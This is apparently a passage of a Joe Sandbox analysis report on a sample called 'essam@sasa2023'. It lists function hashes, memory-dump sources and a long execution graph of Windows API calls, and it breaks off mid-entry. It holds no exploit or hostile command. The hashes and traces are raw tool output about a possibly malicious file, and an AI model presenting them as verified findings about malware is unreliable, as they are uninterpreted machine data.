                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a37a04906ece53fb68f0160aca7e9aaf92822ffea8636ab169d15583348af3e0
                                                                                                                                                                    • Instruction ID: 3d572d8eb1c2a4ea654d45564532f63988d882246b187a128382ae53114f5ac2
                                                                                                                                                                    • Opcode Fuzzy Hash: a37a04906ece53fb68f0160aca7e9aaf92822ffea8636ab169d15583348af3e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 8B01D6B65083806FD711CF05DC40862FFE8EB86220709C49BEC4D8B652D225A908C772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 011407AF Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: f902b924b0578d6a90f40ca702b0aad2087c37c45f1b07a08c1e9c331ea496b8
                                                                                                                                                                    • Instruction ID: 1a09a9b6b956008b1d20b5191e4c56f79d6d12e991e7476e8c00781c30d7a3e9
                                                                                                                                                                    • Opcode Fuzzy Hash: f902b924b0578d6a90f40ca702b0aad2087c37c45f1b07a08c1e9c331ea496b8
                                                                                                                                                                    • Instruction Fuzzy Hash: 14115235508281CFD716CB11C990B55BFB1EB8A708F29C6EEE5494B663C33AD817CB41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 01140878 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d3010c68608ddeec498cba65a171c649a7937eae4883e58b56871c4c4f39c97b
                                                                                                                                                                    • Instruction ID: 9aac12912f97bce9111874eaf5a36cb4aaa8c4f3a0a32db9593ba892b81bd07c
                                                                                                                                                                    • Opcode Fuzzy Hash: d3010c68608ddeec498cba65a171c649a7937eae4883e58b56871c4c4f39c97b
                                                                                                                                                                    • Instruction Fuzzy Hash: 6EF01D35508645DFC306CF45D940B55FBA2EB89B18F24CAADE9491BB62C337D813DA81
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 01140606 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4198716646.0000000001140000.00000040.00000020.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_1140000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a5b8774048334801738b7fd5b945de70eb5a409119aae0ab99ebccef9f58e926
                                                                                                                                                                    • Instruction ID: f2fb6986e5f190534a8d0ebe2f0d4a4bdf2b905c6bbdf0025f1d89f78d328c29
                                                                                                                                                                    • Opcode Fuzzy Hash: a5b8774048334801738b7fd5b945de70eb5a409119aae0ab99ebccef9f58e926
                                                                                                                                                                    • Instruction Fuzzy Hash: 40E092B66006049B9650CF0AEC41462F7D4EBC4630B08C07FDC0D8B701EA3AB508CAA6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FF23F4 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194819176.0000000000FF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF2000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ff2000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 37f0726c10d0e85e8e241f1f0ea8920096ecf606ea41d26ae922897425115b26
                                                                                                                                                                    • Instruction ID: 169c8babbbdb71349d7d4b7d14928c1fb1f0b8b1f0950a66df33ac6dde7ead3b
                                                                                                                                                                    • Opcode Fuzzy Hash: 37f0726c10d0e85e8e241f1f0ea8920096ecf606ea41d26ae922897425115b26
                                                                                                                                                                    • Instruction Fuzzy Hash: 64D05E79604AC14FD317CA1CC5A4BA63794AF51714F4A44FAAC00CB773CBA8D9C1E210
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00FF23BC Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.4194819176.0000000000FF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF2000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ff2000_essam@sasa2023.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 64a3bbc1a3b702cef650f0b21bdc18f8756fc25ddd273da6b2bc412941880da6
                                                                                                                                                                    • Instruction ID: 34cb55980679c566e6eb596832c83b44393d66c9514267053b767b5bb684a84d
                                                                                                                                                                    • Opcode Fuzzy Hash: 64a3bbc1a3b702cef650f0b21bdc18f8756fc25ddd273da6b2bc412941880da6
                                                                                                                                                                    • Instruction Fuzzy Hash: CED05E746006854BC715CA0CC6E4F6937D4AF40714F0644E8AC508B772CBA8D9C4EA00
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:14.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:5.3%
                                                                                                                                                                    Signature Coverage:0.8%
                                                                                                                                                                    Total number of Nodes:1687
                                                                                                                                                                    Total number of Limit Nodes:57
                                                                                                                                                                    execution_graph 71637 698f5dee 71638 698f5e11 71637->71638 71644 698ecbe6 71638->71644 71673 69dbd739 71638->71673 71639 698f5e6c 71640 698f5e7a SetWindowLongW 71640->71639 71641 698f5e34 71641->71639 71641->71640 71645 698ecc29 71644->71645 71646 698ecc01 71644->71646 71645->71641 71647 698ecc0b 71646->71647 71648 698ecc30 71646->71648 71680 698ed353 GetParent 71647->71680 71650 698ecd0f 71648->71650 71651 698ecc3b 71648->71651 71653 698ecd16 71650->71653 71654 698ecd47 71650->71654 71651->71645 71652 698ecc49 71651->71652 71715 698f02e7 SendMessageW 71652->71715 71658 698ecc1b 71653->71658 71716 698ed777 RaiseException SendMessageW 71653->71716 71655 698ecded 71654->71655 71656 698ecd52 71654->71656 71662 698ecdf4 71655->71662 71669 698ece29 71655->71669 71656->71645 71659 698ecd64 71656->71659 71658->71645 71671 698ecf69 71658->71671 71717 698f02e7 SendMessageW 71659->71717 71718 698ed5cc 117 API calls 3 library calls 71662->71718 71664 698ecceb 71664->71645 71666 698ecc6a 71666->71645 71666->71664 71672 698eccfa RaiseException 71666->71672 71667 698ecf4b 71667->71671 71719 698ed5cc 117 API calls 3 library calls 71667->71719 71669->71667 71669->71671 71720 698f5cd1 GetDlgItem SendMessageW 71671->71720 71674 69dbd757 71673->71674 71675 69dbd746 GetTickCount 71673->71675 71677 69dbd771 71674->71677 71679 69dbd763 PostMessageW 71674->71679 72146 69dbfc46 111 API calls 2 library calls 71675->72146 71677->71641 71678 69dbd756 71678->71674 71679->71677 71721 698de153 GetWindowLongW 71680->71721 71684 698ed3b0 71766 698ed073 71684->71766 71686 698ed3b5 GetDlgItem 71782 698e0b11 71686->71782 71692 698ed403 71865 698ed2bf 71692->71865 71694 698ed40a 71695 698ed41c GetDlgItem KiUserCallbackDispatcher 71694->71695 71696 698ed433 71694->71696 71695->71696 71875 698e6615 CreateWindowExW SetWindowPos 71696->71875 71698 698ed448 71876 698ee8e8 71698->71876 71700 698ed457 GetDlgItem 71883 698e6655 71700->71883 71715->71666 71716->71658 71717->71666 71718->71669 71719->71671 71720->71664 71722 698de19f GetWindowRect 71721->71722 71723 698de182 71721->71723 71726 698de228 GetParent GetClientRect GetClientRect MapWindowPoints 71722->71726 71727 698de1b4 71722->71727 71724 698de189 GetParent 71723->71724 71725 698de193 GetWindow 71723->71725 71730 698de19d 71724->71730 71725->71730 71734 698de20f SetWindowPos 71726->71734 71728 698de1b8 GetWindowLongW 71727->71728 71729 698de1c4 MonitorFromWindow 71727->71729 71728->71729 71732 698de1eb GetMonitorInfoW 71729->71732 71733 698de1e4 71729->71733 71730->71722 71732->71733 71735 698de201 71732->71735 71902 698f87c1 71733->71902 71734->71733 71735->71734 71738 698de21b GetWindowRect 71735->71738 71738->71734 71739 698de2da SetWindowTextW 71740 698ed149 71739->71740 71741 698ed155 __EH_prolog3 71740->71741 71742 698ed2a9 ctype 71741->71742 71911 698dc419 71741->71911 71742->71684 71744 698ed173 71921 698ef21d 71744->71921 71746 698ed184 LoadImageW 71747 698ed1a4 SendMessageW 71746->71747 71748 698ed1b5 71746->71748 71747->71748 71926 698ef25e 71748->71926 71750 698ed1bd 71751 698ef21d 68 API calls 71750->71751 71752 698ed1d9 LoadImageW 71751->71752 71753 698ed20f 71752->71753 71754 698ed1f0 GetDlgItem SendMessageW 71752->71754 71755 698ef25e 68 API calls 71753->71755 71754->71753 71756 698ed217 71755->71756 71757 698ef21d 68 API calls 71756->71757 71758 698ed224 LoadImageW 71757->71758 71759 698ed25c 71758->71759 71760 698ed23d GetDlgItem SendMessageW 71758->71760 71761 698ef25e 68 API calls 71759->71761 71760->71759 71762 698ed264 71761->71762 71763 698ef21d 68 API calls 71762->71763 71764 698ed271 LoadImageW 71763->71764 71764->71742 71765 698ed28a GetDlgItem SendMessageW 71764->71765 71765->71742 71767 698ed07f __EH_prolog3 71766->71767 71768 698ed09f 71767->71768 71769 698ed0b3 71767->71769 71770 698ee8e8 ctype 107 API calls 71768->71770 71771 698ed0bf 71769->71771 71772 698ed0f4 71769->71772 71776 698ed0ad 71770->71776 71774 698ee8e8 ctype 107 API calls 71771->71774 71773 698ee8e8 ctype 107 API calls 71772->71773 71773->71776 71775 698ed0c9 71774->71775 71961 698f5075 71775->71961 71965 698eea8d 71776->71965 71779 698ed0ef ctype 71780 698ed127 SetDlgItemTextW 71779->71780 71781 698ed13e ctype 71780->71781 71781->71686 71783 698e0b1a 71782->71783 72014 698de2e1 71783->72014 71786 698e0b37 SendMessageW 71788 698ed86c 71786->71788 71787 698e0b27 SetWindowLongW 71787->71786 72018 698f0324 SendMessageW 71788->72018 71790 698ed8af _memset 71791 698ed8bb SendMessageW 71790->71791 71792 698ed99a 71791->71792 71793 698ed900 71791->71793 71795 698eda4a 71792->71795 71796 698ed9a5 71792->71796 71794 698ee8e8 ctype 107 API calls 71793->71794 71797 698ed915 71794->71797 71799 698edb06 71795->71799 71850 698eda48 71795->71850 71798 698ee8e8 ctype 107 API calls 71796->71798 72019 698ed81a 66 API calls 3 library calls 71797->72019 71802 698ed9ba 71798->71802 71800 698f87c1 ___crtMessageBoxW 5 API calls 71799->71800 71804 698ed3ed SendMessageW 71800->71804 72026 698ed81a 66 API calls 3 library calls 71802->72026 71852 698ecfa5 71804->71852 71805 698ed921 72020 698f0353 SendMessageW GetWindowTextLengthW SendMessageW 71805->72020 71807 698eda64 71810 698ee8e8 ctype 107 API calls 71807->71810 71809 698ed9c6 72027 698f0353 SendMessageW GetWindowTextLengthW SendMessageW 71809->72027 71811 698eda79 71810->71811 72035 698ed81a 66 API calls 3 library calls 71811->72035 71812 698ed92c ctype 72021 698f0353 SendMessageW GetWindowTextLengthW SendMessageW 71812->72021 71815 698eda85 72036 698f0353 SendMessageW GetWindowTextLengthW SendMessageW 71815->72036 71818 698ed9d1 ctype 72028 698f0353 SendMessageW GetWindowTextLengthW SendMessageW 71818->72028 71819 698eda8f ctype 72037 698f0353 SendMessageW GetWindowTextLengthW SendMessageW 71819->72037 71820 698ed94c 72022 698e0d3d 7 API calls 2 library calls 71820->72022 71822 698ed9f1 72029 698e0d3d 7 API calls 2 library calls 71822->72029 71825 698ed964 72023 698e0e35 7 API calls 2 library calls 71825->72023 71826 698eda09 72030 698e0e35 7 API calls 2 library calls 71826->72030 71829 698ed977 72024 698e0d3d 7 API calls 2 library calls 71829->72024 71831 698edaaf 72038 698e0d3d 7 API calls 2 library calls 71831->72038 71833 698eda1c 72031 698e0d3d 7 API calls 2 library calls 71833->72031 71835 698ed983 72025 698e0e35 7 API calls 2 library calls 71835->72025 71837 698edac7 72039 698e0e35 7 API calls 2 library calls 71837->72039 71839 698eda28 72032 698e0e35 7 API calls 2 library calls 71839->72032 71841 698ed992 72042 698edd4c 129 API calls ctype 71841->72042 71843 698edada 72040 698e0d3d 7 API calls 2 library calls 71843->72040 71845 698eda37 72033 698edd4c 129 API calls ctype 71845->72033 71849 698edae6 72041 698e0e35 7 API calls 2 library calls 71849->72041 71850->71795 72034 698f0353 SendMessageW GetWindowTextLengthW SendMessageW 71850->72034 71853 698ecfb1 __EH_prolog3 71852->71853 71854 698ee8e8 ctype 107 API calls 71853->71854 71855 698ecfbf ctype 71854->71855 71856 698f5075 104 API calls 71855->71856 71857 698ed010 GetDlgItem 71856->71857 71858 698ed02c 71857->71858 71859 698de2e1 2 API calls 71858->71859 71860 698ed034 71859->71860 71861 698ed038 SetWindowLongW 71860->71861 71862 698ed051 SetDlgItemTextW 71860->71862 71861->71862 71863 698ed04b 71861->71863 71864 698ed068 ctype 71862->71864 71863->71862 71864->71692 71866 698ed2cb __EH_prolog3 71865->71866 71867 698ee8e8 ctype 107 API calls 71866->71867 71868 698ed2d9 SetDlgItemTextW 71867->71868 71870 698ed30d ctype 71868->71870 71871 698ee8e8 ctype 107 API calls 71870->71871 71872 698ed31b SetDlgItemTextW 71871->71872 71874 698ed348 ctype 71872->71874 71874->71694 71875->71698 71878 698ee8f4 __EH_prolog3 71876->71878 71877 698ee925 71880 698f81b6 ctype 98 API calls 71877->71880 71878->71877 71879 698ee919 71878->71879 72043 698eefa1 71879->72043 71882 698ee923 ctype 71880->71882 71882->71700 71884 698e6661 __EH_prolog3_GS 71883->71884 71885 698ee8e8 ctype 107 API calls 71884->71885 71886 698e6678 71885->71886 72069 698ef35e 71886->72069 71888 698e6685 ctype 71889 698e670a RaiseException 71888->71889 71890 698e66a2 71888->71890 71891 698e66b8 _memset 71890->71891 71892 698f81de ctype 67 API calls 71890->71892 71893 698e66c8 GetClientRect SendMessageW 71891->71893 71892->71891 72075 69902722 71893->72075 71903 698f87cb IsDebuggerPresent 71902->71903 71904 698f87c9 71902->71904 71910 698ff0b7 71903->71910 71904->71739 71907 698faf10 SetUnhandledExceptionFilter UnhandledExceptionFilter 71908 698faf2d __call_reportfault 71907->71908 71909 698faf35 GetCurrentProcess TerminateProcess 71907->71909 71908->71909 71909->71739 71910->71907 71912 698dc425 __EH_prolog3 71911->71912 71913 698dc466 GetModuleFileNameW 71912->71913 71930 698f827a 71912->71930 71915 698dc47e 71913->71915 71917 698ee8e8 ctype 107 API calls 71915->71917 71916 698dc463 71916->71913 71918 698dc486 71917->71918 71919 698ef25e 68 API calls 71918->71919 71920 698dc491 ctype 71919->71920 71920->71744 71922 698ef22e ctype 71921->71922 71957 698f82d1 71922->71957 71925 698ef251 71925->71746 71927 698f82d1 ctype 67 API calls 71926->71927 71928 698ef26e PathRemoveFileSpecW 71927->71928 71929 698ef27f 71928->71929 71929->71750 71931 698f828b 71930->71931 71933 698f829a ctype 71931->71933 71934 698f81de 71931->71934 71933->71916 71935 698f81fa 71934->71935 71940 69901dbe 71935->71940 71936 698f8205 71944 698f8923 71936->71944 71938 698f8229 ctype 71938->71933 71942 69901ddd 71940->71942 71941 69901e03 71941->71936 71942->71941 71953 69901c56 RtlAllocateHeap 71942->71953 71945 698f8934 _memset 71944->71945 71951 698f8930 _memmove 71944->71951 71946 698f893a 71945->71946 71950 698f897f 71945->71950 71945->71951 71954 698fb570 66 API calls __getptd_noexit 71946->71954 71948 698f893f 71955 698fb514 11 API calls _raise 71948->71955 71950->71951 71956 698fb570 66 API calls __getptd_noexit 71950->71956 71951->71938 71953->71941 71954->71948 71955->71951 71956->71948 71958 698f82dc 71957->71958 71959 698ef23d PathAppendW 71958->71959 71960 698f827a ctype 67 API calls 71958->71960 71959->71925 71960->71959 71962 698f5081 71961->71962 71972 698f681a 71962->71972 71964 698f50a0 71964->71779 71966 698eea9c 71965->71966 71971 698eeaae ctype 71965->71971 71967 698eeabe 71966->71967 71968 698eeaa9 71966->71968 71969 698f811c ctype 98 API calls 71967->71969 72010 698f83fd 71968->72010 71969->71971 71971->71779 71980 6990265b 71972->71980 71974 698f6826 GetLastError SetLastError FormatMessageW GetLastError 71975 698f6865 SetLastError 71974->71975 71976 698f6860 71974->71976 71981 698f81b6 71975->71981 71976->71975 71979 698f6883 ctype 71979->71964 71980->71974 71982 698f81c4 ctype 71981->71982 71985 698f811c 71982->71985 71984 698f6875 LocalFree 71984->71979 71986 698f8129 ctype 71985->71986 71987 698f8130 71985->71987 71986->71984 71988 698f82d1 ctype 67 API calls 71987->71988 71989 698f8154 71988->71989 71990 698f815d 71989->71990 71991 698f8171 71989->71991 71996 698f8c1a 66 API calls 2 library calls 71990->71996 71993 698f8923 _memcpy_s 66 API calls 71991->71993 71994 698f816f 71993->71994 71997 698f830d 71994->71997 71996->71994 71998 698f8311 71997->71998 71999 698f8318 71998->71999 72001 698f8367 71998->72001 72008 698f8bf9 66 API calls _vwprintf 71998->72008 71999->71986 72002 698f82d1 ctype 67 API calls 72001->72002 72003 698f836d 72002->72003 72009 698f8b76 97 API calls swprintf 72003->72009 72005 698f837d 72006 698f830d ctype 98 API calls 72005->72006 72007 698f8389 72006->72007 72007->71986 72008->71998 72009->72005 72012 698f840a 72010->72012 72011 698f8416 72011->71971 72012->72011 72013 698f8923 _memcpy_s 66 API calls 72012->72013 72013->72011 72015 698de2ef 72014->72015 72016 698de2fb GetCurrentProcess FlushInstructionCache 72014->72016 72015->72016 72017 698de329 72015->72017 72016->72017 72017->71786 72017->71787 72018->71790 72019->71805 72020->71812 72021->71820 72022->71825 72023->71829 72024->71835 72025->71841 72026->71809 72027->71818 72028->71822 72029->71826 72030->71833 72031->71839 72032->71845 72033->71850 72034->71807 72035->71815 72036->71819 72037->71831 72038->71837 72039->71843 72040->71849 72041->71841 72042->71799 72052 69901efe EnterCriticalSection LeaveCriticalSection RaiseException LeaveCriticalSection 72043->72052 72045 698eefb9 72046 698eefc6 FindResourceExW 72045->72046 72047 698ef002 72045->72047 72063 698f7a10 LoadResource 72045->72063 72067 69901efe EnterCriticalSection LeaveCriticalSection RaiseException LeaveCriticalSection 72045->72067 72046->72045 72048 698ef008 72047->72048 72053 698ef024 FindResourceW 72047->72053 72048->71882 72052->72045 72054 698ef059 72053->72054 72055 698ef047 72053->72055 72054->72048 72056 698f7a10 ctype 3 API calls 72055->72056 72057 698ef053 72056->72057 72057->72054 72058 698f82d1 ctype 67 API calls 72057->72058 72059 698ef067 72058->72059 72068 698f7a92 66 API calls _wmemcpy_s 72059->72068 72061 698ef077 72062 698f830d ctype 98 API calls 72061->72062 72062->72054 72064 698f7a28 LockResource 72063->72064 72066 698f7a49 72063->72066 72065 698f7a36 SizeofResource 72064->72065 72064->72066 72065->72066 72066->72045 72067->72045 72068->72061 72071 698ef36a __EH_prolog3 72069->72071 72070 698ef3ac 72072 698f83fd std::bad_exception::bad_exception 66 API calls 72070->72072 72073 698ef3d2 ctype 72070->72073 72071->72070 72071->72073 72078 698f8eaa 72071->72078 72072->72073 72073->71888 72076 698f87c1 ___crtMessageBoxW 5 API calls 72075->72076 72077 6990272c 72076->72077 72077->72077 72079 698f8eb9 72078->72079 72080 698f8ed4 72078->72080 72079->72080 72081 698f8ec5 72079->72081 72082 698f8ee9 72080->72082 72109 698faf4e 67 API calls _raise 72080->72109 72108 698fb570 66 API calls __getptd_noexit 72081->72108 72087 698fd763 72082->72087 72086 698f8eca _memset 72086->72070 72088 698fd76e 72087->72088 72089 698fd779 72087->72089 72110 698f8fcb 72088->72110 72091 698fd781 72089->72091 72099 698fd78e 72089->72099 72127 698f8e26 66 API calls 2 library calls 72091->72127 72094 698fd7c6 72129 698fda46 _DecodePointerInternal 72094->72129 72095 698fd796 RtlReAllocateHeap 72095->72099 72104 698fd789 __dosmaperr 72095->72104 72097 698fd7cc 72130 698fb570 66 API calls __getptd_noexit 72097->72130 72098 698fd7f6 72132 698fb570 66 API calls __getptd_noexit 72098->72132 72099->72094 72099->72095 72099->72098 72105 698fd7de 72099->72105 72128 698fda46 _DecodePointerInternal 72099->72128 72103 698fd7fb GetLastError 72103->72104 72104->72086 72131 698fb570 66 API calls __getptd_noexit 72105->72131 72107 698fd7e3 GetLastError 72107->72104 72108->72086 72109->72082 72111 698f9048 72110->72111 72118 698f8fd9 72110->72118 72139 698fda46 _DecodePointerInternal 72111->72139 72113 698f904e 72140 698fb570 66 API calls __getptd_noexit 72113->72140 72116 698f9007 RtlAllocateHeap 72116->72118 72126 698f9040 72116->72126 72118->72116 72119 698f9034 72118->72119 72120 698f8fe4 72118->72120 72124 698f9032 72118->72124 72136 698fda46 _DecodePointerInternal 72118->72136 72137 698fb570 66 API calls __getptd_noexit 72119->72137 72120->72118 72133 698fd9f4 66 API calls 2 library calls 72120->72133 72134 698fd840 66 API calls 7 library calls 72120->72134 72135 698fa044 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72120->72135 72138 698fb570 66 API calls __getptd_noexit 72124->72138 72126->72086 72127->72104 72128->72099 72129->72097 72130->72104 72131->72107 72132->72103 72133->72120 72134->72120 72136->72118 72137->72124 72138->72126 72139->72113 72140->72126 72146->71678 72147 698e0eac 72150 698e11ba 72147->72150 72151 698e11cc WriteFile 72150->72151 72152 698e11c9 72150->72152 72153 698e11e7 FlushFileBuffers 72151->72153 72154 698e11e2 72151->72154 72152->72151 72155 698e0ec1 72153->72155 72156 698e11f5 72153->72156 72159 698f7f08 GetLastError 72154->72159 72160 698f7f08 GetLastError 72156->72160 72159->72153 72160->72155 72161 698dff39 GetWindowPlacement 72162 698dff8f 72161->72162 72163 698dff87 72161->72163 72165 698f87c1 ___crtMessageBoxW 5 API calls 72162->72165 72167 698f76ee 66 API calls 2 library calls 72163->72167 72166 698dffc5 72165->72166 72167->72162 72168 69dcb059 72169 69dcb069 72168->72169 72170 69dcb064 72168->72170 72174 69dcaf5e 72169->72174 72182 69dce588 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 72170->72182 72173 69dcb077 72175 69dcaf6a __close 72174->72175 72178 69dcafb7 ___DllMainCRTStartup 72175->72178 72179 69dcb007 __close 72175->72179 72183 69dcadf5 72175->72183 72177 69dcafe7 72177->72179 72180 69dcadf5 __CRT_INIT@12 149 API calls 72177->72180 72178->72177 72178->72179 72181 69dcadf5 __CRT_INIT@12 149 API calls 72178->72181 72179->72173 72180->72179 72181->72177 72182->72169 72184 69dcae01 __close 72183->72184 72185 69dcae09 72184->72185 72186 69dcae83 72184->72186 72235 69dce1d6 HeapCreate 72185->72235 72188 69dcae89 72186->72188 72189 69dcaee4 72186->72189 72193 69dcaea7 72188->72193 72202 69dcae12 __close 72188->72202 72308 69dcdacb 66 API calls _doexit 72188->72308 72190 69dcaee9 72189->72190 72191 69dcaf42 72189->72191 72313 69dcd21f TlsGetValue _DecodePointerInternal TlsSetValue 72190->72313 72191->72202 72327 69dcd524 79 API calls __freefls@4 72191->72327 72192 69dcae0e 72192->72202 72236 69dcd597 GetModuleHandleW 72192->72236 72198 69dcaebb 72193->72198 72309 69dcdd4c 67 API calls _free 72193->72309 72195 69dcaeee 72314 69dcd761 72195->72314 72312 69dcaece 70 API calls __mtterm 72198->72312 72201 69dcae1e __RTC_Initialize 72206 69dcae22 72201->72206 72212 69dcae2e GetCommandLineA 72201->72212 72202->72178 72303 69dce1f9 HeapDestroy 72206->72303 72207 69dcaeb1 72310 69dcd258 70 API calls _free 72207->72310 72208 69dcaf06 _DecodePointerInternal 72213 69dcaf1b 72208->72213 72211 69dcaeb6 72311 69dce1f9 HeapDestroy 72211->72311 72261 69dce0e4 GetEnvironmentStringsW 72212->72261 72216 69dcaf1f 72213->72216 72217 69dcaf36 72213->72217 72320 69dcd29a 66 API calls 4 library calls 72216->72320 72321 69dcbe0e 72217->72321 72222 69dcaf26 GetCurrentThreadId 72222->72202 72224 69dcae4c 72304 69dcd258 70 API calls _free 72224->72304 72227 69dcae58 72228 69dcae6c 72227->72228 72287 69dcdda4 72227->72287 72234 69dcae71 72228->72234 72307 69dcdd4c 67 API calls _free 72228->72307 72232 69dcae81 72232->72224 72234->72202 72235->72192 72237 69dcd5ab 72236->72237 72238 69dcd5b4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 72236->72238 72328 69dcd258 70 API calls _free 72237->72328 72240 69dcd5fe TlsAlloc 72238->72240 72243 69dcd64c TlsSetValue 72240->72243 72244 69dcd70d 72240->72244 72241 69dcd5b0 72241->72201 72243->72244 72245 69dcd65d 72243->72245 72244->72201 72329 69dcd86e _EncodePointerInternal _EncodePointerInternal __init_pointers _rand_s __initp_misc_winsig 72245->72329 72247 69dcd662 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 72330 69dd24bd InitializeCriticalSectionAndSpinCount 72247->72330 72249 69dcd6a1 72250 69dcd708 72249->72250 72251 69dcd6a5 _DecodePointerInternal 72249->72251 72332 69dcd258 70 API calls _free 72250->72332 72253 69dcd6ba 72251->72253 72253->72250 72254 69dcd761 __calloc_crt 66 API calls 72253->72254 72255 69dcd6d0 72254->72255 72255->72250 72256 69dcd6d8 _DecodePointerInternal 72255->72256 72257 69dcd6e9 72256->72257 72257->72250 72258 69dcd6ed 72257->72258 72331 69dcd29a 66 API calls 4 library calls 72258->72331 72260 69dcd6f5 GetCurrentThreadId 72260->72244 72262 69dcae3e 72261->72262 72263 69dce100 WideCharToMultiByte 72261->72263 72274 69dcdb02 GetStartupInfoW 72262->72274 72265 69dce16d FreeEnvironmentStringsW 72263->72265 72266 69dce135 72263->72266 72265->72262 72333 69dcd717 66 API calls _malloc 72266->72333 72268 69dce13b 72268->72265 72269 69dce143 WideCharToMultiByte 72268->72269 72270 69dce155 72269->72270 72271 69dce161 FreeEnvironmentStringsW 72269->72271 72272 69dcbe0e _free 66 API calls 72270->72272 72271->72262 72273 69dce15d 72272->72273 72273->72271 72275 69dcd761 __calloc_crt 66 API calls 72274->72275 72278 69dcdb20 72275->72278 72276 69dcae48 72276->72224 72305 69dce024 95 API calls 3 library calls 72276->72305 72277 69dcdccb GetStdHandle 72279 69dcdc95 72277->72279 72278->72276 72278->72279 72280 69dcd761 __calloc_crt 66 API calls 72278->72280 72286 69dcdc15 72278->72286 72279->72277 72281 69dcdd2f SetHandleCount 72279->72281 72282 69dcdcdd GetFileType 72279->72282 72285 69dcdd03 InitializeCriticalSectionAndSpinCount 72279->72285 72280->72278 72281->72276 72282->72279 72283 69dcdc4c InitializeCriticalSectionAndSpinCount 72283->72276 72283->72286 72284 69dcdc41 GetFileType 72284->72283 72284->72286 72285->72276 72285->72279 72286->72279 72286->72283 72286->72284 72288 69dcddad 72287->72288 72291 69dcddb2 _strlen 72287->72291 72334 69dd1be4 94 API calls __setmbcp 72288->72334 72290 69dcae61 72290->72228 72306 69dcd8cf 77 API calls 4 library calls 72290->72306 72291->72290 72292 69dcd761 __calloc_crt 66 API calls 72291->72292 72295 69dcdde7 _strlen 72292->72295 72293 69dcde36 72294 69dcbe0e _free 66 API calls 72293->72294 72294->72290 72295->72290 72295->72293 72296 69dcd761 __calloc_crt 66 API calls 72295->72296 72297 69dcde5c 72295->72297 72300 69dcde73 72295->72300 72335 69dd2a21 66 API calls __close 72295->72335 72296->72295 72298 69dcbe0e _free 66 API calls 72297->72298 72298->72290 72336 69dcec98 10 API calls __call_reportfault 72300->72336 72302 69dcde7f 72303->72202 72304->72206 72305->72227 72306->72228 72307->72232 72308->72193 72309->72207 72310->72211 72311->72198 72312->72202 72313->72195 72317 69dcd76a 72314->72317 72316 69dcaefa 72316->72202 72316->72208 72317->72316 72318 69dcd788 Sleep 72317->72318 72337 69dd0eda 72317->72337 72319 69dcd79d 72318->72319 72319->72316 72319->72317 72320->72222 72322 69dcbe19 HeapFree 72321->72322 72326 69dcbe42 __dosmaperr 72321->72326 72323 